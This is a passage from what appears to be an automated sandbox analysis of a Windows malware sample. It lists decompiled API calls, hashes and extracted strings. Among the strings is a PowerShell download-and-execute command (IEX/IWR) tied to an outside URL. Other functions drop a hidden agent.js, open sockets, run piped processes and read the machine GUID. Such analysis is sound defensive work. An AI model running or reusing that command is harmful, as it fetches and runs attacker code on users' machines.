                  • Part of subcall function 007921A0: task.LIBCPMTD ref: 007922A5
                  • Part of subcall function 007921A0: task.LIBCPMTD ref: 007922B4
                Strings
                • bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs, xrefs: 00792BAF
                • ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund, xrefs: 00792C12
                • rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo, xrefs: 00792DE8
                • shtumcttjzvhu, xrefs: 00792E65
                • upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs, xrefs: 00792B5E
                • sqfyhcibiyaixyvseuhuztdlx, xrefs: 00792C6B
                • cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho, xrefs: 00792E11
                • nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs, xrefs: 00792DA3
                • fuisqwdbksjnkwghhwh, xrefs: 00792CC8
                • gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa, xrefs: 00792D71
                • gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj, xrefs: 00792ECF
                • syntqwezljesnhnfjaztdeotfzpejojodftab, xrefs: 00792EB0
                • yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy, xrefs: 00792E36
                • jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu, xrefs: 00792D8A
                • brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis, xrefs: 00792E7E
                • bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg, xrefs: 00792CFB
                • rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb, xrefs: 00792C52
                • jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd, xrefs: 00792E97
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$operator!=$char_traits
                • String ID: bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg$bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs$brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis$ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund$cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho$fuisqwdbksjnkwghhwh$gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj$gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa$jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu$jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd$nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs$rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb$rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo$shtumcttjzvhu$sqfyhcibiyaixyvseuhuztdlx$syntqwezljesnhnfjaztdeotfzpejojodftab$upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs$yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy
                • API String ID: 1022754510-231213261
                • Opcode ID: 08ba15a239198e0ceb60b1284c1314ddf7fce7cf7d9ec832cd31a9b674b3fc61
                • Instruction ID: 8fa848af34d7e98686e7966aca4a7ef129be1c24b50804ecb3e2e868f1665ddc
                • Opcode Fuzzy Hash: 08ba15a239198e0ceb60b1284c1314ddf7fce7cf7d9ec832cd31a9b674b3fc61
                • Instruction Fuzzy Hash: 14B14D70E50708EADB04FFB8DD1B7AEBB71AF47B00F404259E4513B1C6EA791A548B92

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 826 7921a0-7922bf call 793040 * 6 call 7933d0 call 793020 * 2 845 7922dd-7922df 826->845 846 7922c1-7922c8 826->846 848 7922fd-7922ff 845->848 849 7922e1-7922e8 845->849 847 7922d3-7922d7 846->847 847->845 852 7922d9 847->852 850 79231d-792324 848->850 851 792301-792308 848->851 853 7922f3-7922f7 849->853 855 79234e-7923c3 call 793040 * 2 call 7933d0 call 793020 * 2 850->855 856 792326-792330 850->856 854 792313-792317 851->854 852->847 853->848 858 7922f9 853->858 854->850 859 792319 854->859 875 7923ed-792448 call 793020 * 4 call 793a94 855->875 876 7923c5-7923cf 855->876 860 792341-792348 856->860 858->853 859->854 860->855 864 79234a 860->864 864->860 877 7923e0-7923e7 876->877 877->875 879 7923e9 877->879 879->877
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: -$P$[$ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
                • API String ID: 2802545854-2318821752
                • Opcode ID: 242dd87ea2173ec3308cf0a804c130ea34fbcaf8756cbe3954d940704cc86966
                • Instruction ID: 4121e8f4bc109ded1ea3badc7abf59354c88f25f7990e9935490d72d7aa73e6c
                • Opcode Fuzzy Hash: 242dd87ea2173ec3308cf0a804c130ea34fbcaf8756cbe3954d940704cc86966
                • Instruction Fuzzy Hash: E3715A70D04258DEDF24EB68E859BEDBBB1BB01304F10819DD049A7282DB795B89DF51
                APIs
                • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 011F8551
                • ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 011F8564
                • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 011F8577
                • GetFileAttributesW.KERNEL32(?), ref: 011F859D
                • GetFileAttributesW.KERNEL32(?), ref: 011F85B6
                • lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 011F85CD
                • wnsprintfW.SHLWAPI ref: 011F85F0
                • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 011F8612
                Strings
                • %SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 011F855F
                • %ComSpec%, xrefs: 011F8572
                • https://kionaonline.com/modules/bonslick, xrefs: 011F85DA
                • /c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 011F85DF
                • sd2.ps1, xrefs: 011F85A8
                • %SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 011F854C
                • open, xrefs: 011F860B
                • sd4.ps1, xrefs: 011F85C1
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
                • String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://kionaonline.com/modules/bonslick$open$sd2.ps1$sd4.ps1
                • API String ID: 4132772799-999334212
                • Opcode ID: 955c536a676e4b0b17fc0d7c25df1fc8cbc51370f4dade14e3004e6e2826ecb8
                • Instruction ID: edb1bcc9b96597d6fcd355a80a292ee3c538ba671b623b1e0874d06183661ece
                • Opcode Fuzzy Hash: 955c536a676e4b0b17fc0d7c25df1fc8cbc51370f4dade14e3004e6e2826ecb8
                • Instruction Fuzzy Hash: 72212B7194421CBBDB25DA64DC49FEA776CEB04714F0001AEE728E20C0E7B096C58F90
                APIs
                • CreatePipe.KERNEL32(?,?,?,00000000), ref: 011F5713
                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5771
                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5784
                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5789
                • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F57A0
                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F57B7
                • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F57F4
                • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F581F
                • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5822
                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F582D
                • HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5830
                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F5887
                • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F58A3
                • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 011F58A8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
                • String ID: D
                • API String ID: 2337985897-2746444292
                • Opcode ID: db0c4c38397000ff08e1482f8d3c820c56d9635ae90c6dc6502fbc4c80f68c28
                • Instruction ID: e6830026cd8ef92111af84e2bf17b48c67478ec4b7e619816b3cf05b6c8f1000
                • Opcode Fuzzy Hash: db0c4c38397000ff08e1482f8d3c820c56d9635ae90c6dc6502fbc4c80f68c28
                • Instruction Fuzzy Hash: B8519171A00219AFEB248FA6DC44FAEBFBAFF44704F14446DEA25E7280D77498448B64
                APIs
                • inet_pton.WS2_32(00000002,?,?), ref: 011F72B3
                • htons.WS2_32(?), ref: 011F72BE
                • socket.WS2_32(00000002,00000001,00000006), ref: 011F72D6
                • connect.WS2_32(00000000,?,00000010), ref: 011F72F4
                • recv.WS2_32(00000000,?,00000002,00000000), ref: 011F730C
                • GetProcessHeap.KERNEL32(00000008,00000024), ref: 011F732D
                • HeapAlloc.KERNEL32(00000000), ref: 011F7330
                • CreateThread.KERNEL32(00000000,00000000,Function_000062B0,00000000,00000000,00000000), ref: 011F73AB
                • CloseHandle.KERNEL32(00000000), ref: 011F73B6
                • recv.WS2_32(00000000,?,00000002,00000000), ref: 011F73CE
                • closesocket.WS2_32(00000000), ref: 011F73DD
                • GetProcessHeap.KERNEL32(00000000,?), ref: 011F73E6
                • HeapFree.KERNEL32(00000000), ref: 011F73E9
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F7403
                • HeapFree.KERNEL32(00000000), ref: 011F7406
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$Freerecv$AllocCloseCreateHandleThreadclosesocketconnecthtonsinet_ptonsocket
                • String ID:
                • API String ID: 2784442062-0
                • Opcode ID: f367a6ed4825b025a0479f334163eacdebab36d51ccc38c9673005cba751c72b
                • Instruction ID: b2f0330c127fe1fd7fae859619d1bd7179df1afeb4085686c0ec7a6d6d757163
                • Opcode Fuzzy Hash: f367a6ed4825b025a0479f334163eacdebab36d51ccc38c9673005cba751c72b
                • Instruction Fuzzy Hash: DE41C134A08345BAE7388B79DC4AB6A7F7CEF05710F14416CFB12DA1C2D770948187A8
                APIs
                Strings
                • fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv, xrefs: 00791EF6
                • gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb, xrefs: 00791EDD
                • hcndlsldtwhpkrlbisuiflvfeofcd, xrefs: 00791EC5, 00791F07, 00791F24
                • `, xrefs: 00791F6C
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: `$fqcnfbsuagfcfmkulovbxmvizvobyurvsteowvzesefv$gbcuevkdwlyxwbzmpefkuoenueguybulmwuznauozbxusslsuijupaxueqkxsqzpcvloouwfhzpehzpgdgujbfb$hcndlsldtwhpkrlbisuiflvfeofcd
                • API String ID: 1455298312-2158094500
                • Opcode ID: a10f1240f083a7524a03a2d4b21f506deda8f8a1bf957a54bda4f695598308cc
                • Instruction ID: cbe57274941b8d72fa8f9c69a3ca2f5d5ad7965d39eecaad4c106b2c9401f698
                • Opcode Fuzzy Hash: a10f1240f083a7524a03a2d4b21f506deda8f8a1bf957a54bda4f695598308cc
                • Instruction Fuzzy Hash: C441187090538CDADF04DBA8E969BEEFBB1AF11704F504199E0057B292EB791B18CB91
                APIs
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 011F7191
                • lstrlenW.KERNEL32(?), ref: 011F719A
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 011F71B5
                • GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 011F71C3
                • GetLastError.KERNEL32 ref: 011F71CD
                • ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 011F71E4
                • wnsprintfW.SHLWAPI ref: 011F71FE
                • SetFileAttributesW.KERNEL32(?,00000006), ref: 011F721E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: EnvironmentExpandStrings$AttributesDirectoryErrorFileLastSystemWow64lstrlenwnsprintf
                • String ID: "%s"$%ProgramData%\agent.js$%ProgramFiles%$%ProgramW6432%
                • API String ID: 457462216-4115850629
                • Opcode ID: b313f2f2baf35f4ca5a09fef26fa66436b86cd7fa325b4fa2f445fc3f4673011
                • Instruction ID: ef2c1d408648ab12e9ffc6c42cf0a01a5f4c83a57b85d09393b4c9a53959f75f
                • Opcode Fuzzy Hash: b313f2f2baf35f4ca5a09fef26fa66436b86cd7fa325b4fa2f445fc3f4673011
                • Instruction Fuzzy Hash: A31169B1A4431CABD724D690EC49FD9777C9B05704F4400AAEB25D2054E7B156C88F95
                APIs
                • ___free_lconv_mon.LIBCMT ref: 0079A108
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C4C
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C5E
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C70
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C82
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799C94
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CA6
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CB8
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CCA
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CDC
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799CEE
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799D00
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799D12
                  • Part of subcall function 00799C2F: _free.LIBCMT ref: 00799D24
                • _free.LIBCMT ref: 0079A0FD
                  • Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
                  • Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA
                • _free.LIBCMT ref: 0079A11F
                • _free.LIBCMT ref: 0079A134
                • _free.LIBCMT ref: 0079A13F
                • _free.LIBCMT ref: 0079A161
                • _free.LIBCMT ref: 0079A174
                • _free.LIBCMT ref: 0079A182
                • _free.LIBCMT ref: 0079A18D
                • _free.LIBCMT ref: 0079A1C5
                • _free.LIBCMT ref: 0079A1CC
                • _free.LIBCMT ref: 0079A1E9
                • _free.LIBCMT ref: 0079A201
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: a29d6b986b16dbe0b65b1673f7a4ddef5ec955171482823d519d90036ee72334
                • Instruction ID: 2046e2f20d29afc9ef52efa27c96fbc1338853e7eb42055fda084a23dda594bd
                • Opcode Fuzzy Hash: a29d6b986b16dbe0b65b1673f7a4ddef5ec955171482823d519d90036ee72334
                • Instruction Fuzzy Hash: BD313D31649209EFEF35AA38F849B5AB7FAAF40310F148429E459E6151EF38ED81C761
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: task$char_traitsoperator!=
                • String ID: $($0$8$W$nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng
                • API String ID: 2802545854-1628632686
                • Opcode ID: e99e96a17721dd65316f7c0413aa5410df1f2444bc7449787553a701ad68a58f
                • Instruction ID: bb1ea8bc06ebe93f2eb3314b2114c4a5b18e22c2c6e27017820e2cae4a6a7e9f
                • Opcode Fuzzy Hash: e99e96a17721dd65316f7c0413aa5410df1f2444bc7449787553a701ad68a58f
                • Instruction Fuzzy Hash: 1C518D70D0420CEFDF04EFA8E954BADBBB1FF45304F108259E405ABA82EB795A45CB40
                APIs
                • EnterCriticalSection.KERNEL32(011FA080), ref: 011F69A1
                • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 011F69DA
                • LeaveCriticalSection.KERNEL32(011FA080,00000000), ref: 011F69F6
                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A50
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A57
                • LeaveCriticalSection.KERNEL32(011FA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A6D
                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A87
                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A8E
                • LeaveCriticalSection.KERNEL32(011FA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6A9F
                • GetProcessHeap.KERNEL32(00000008,?,?), ref: 011F6AAB
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011F6AB2
                • LeaveCriticalSection.KERNEL32(011FA080), ref: 011F6AC3
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
                • String ID:
                • API String ID: 2132424838-0
                • Opcode ID: c55c139c6b48d05121a6535ff009350036432681b6bf3e5eec3920021f7275a6
                • Instruction ID: 535ac5a236e7b434a3c23abcdcee5c783bd6eba3595909e2fdfb4dd7cb0dcb68
                • Opcode Fuzzy Hash: c55c139c6b48d05121a6535ff009350036432681b6bf3e5eec3920021f7275a6
                • Instruction Fuzzy Hash: 6B315CB16042119FE72D9F69F84CB663B69FB88311F18413DE66AC7245DB388085C754
                APIs
                • _free.LIBCMT ref: 00798228
                  • Part of subcall function 00797FB2: HeapFree.KERNEL32(00000000,00000000,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?), ref: 00797FC8
                  • Part of subcall function 00797FB2: GetLastError.KERNEL32(?,?,00799DC0,?,00000000,?,?,?,00799DE7,?,00000007,?,?,0079A25B,?,?), ref: 00797FDA
                • _free.LIBCMT ref: 00798234
                • _free.LIBCMT ref: 0079823F
                • _free.LIBCMT ref: 0079824A
                • _free.LIBCMT ref: 00798255
                • _free.LIBCMT ref: 00798260
                • _free.LIBCMT ref: 0079826B
                • _free.LIBCMT ref: 00798276
                • _free.LIBCMT ref: 00798281
                • _free.LIBCMT ref: 0079828F
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: de4d548eba0028b70636c4fd757b545cd9f520b08e21853f46fc9691fb30b708
                • Instruction ID: b12616158362e59d9eb675210cfc06ae6362f9da2838d9a432894a42d7a1a2a5
                • Opcode Fuzzy Hash: de4d548eba0028b70636c4fd757b545cd9f520b08e21853f46fc9691fb30b708
                • Instruction Fuzzy Hash: 57219A76A14108EFCF45EF94E885DDE7BB9BF08340F004166F519AB221DB35DA95CB90
                APIs
                • type_info::operator==.LIBVCRUNTIME ref: 007954FA
                • ___TypeMatch.LIBVCRUNTIME ref: 00795608
                • _UnwindNestedFrames.LIBCMT ref: 0079575A
                • CallUnexpected.LIBVCRUNTIME ref: 00795775
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm$G&
                • API String ID: 2751267872-2003760868
                • Opcode ID: afd7c5a7727a1a9e1b6c15af85d4bb289a3da4024fc41f7d74050cfde5eb6c69
                • Instruction ID: 1199225f03e53d78229b0b5f881270dd5a76117e5c95b63f6c10f385acd2bfe8
                • Opcode Fuzzy Hash: afd7c5a7727a1a9e1b6c15af85d4bb289a3da4024fc41f7d74050cfde5eb6c69
                • Instruction Fuzzy Hash: 63B19E71800A29EFCF16DFA4E8859AEBBB5FF14310F15415AE8016B212D739DA61CF91
                APIs
                • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 011F7047
                • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 011F7063
                • GetProcessHeap.KERNEL32(00000008,?), ref: 011F7072
                • HeapAlloc.KERNEL32(00000000), ref: 011F7079
                • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 011F7096
                • RegCloseKey.ADVAPI32(80000002), ref: 011F70A8
                Strings
                Memory Dump Source
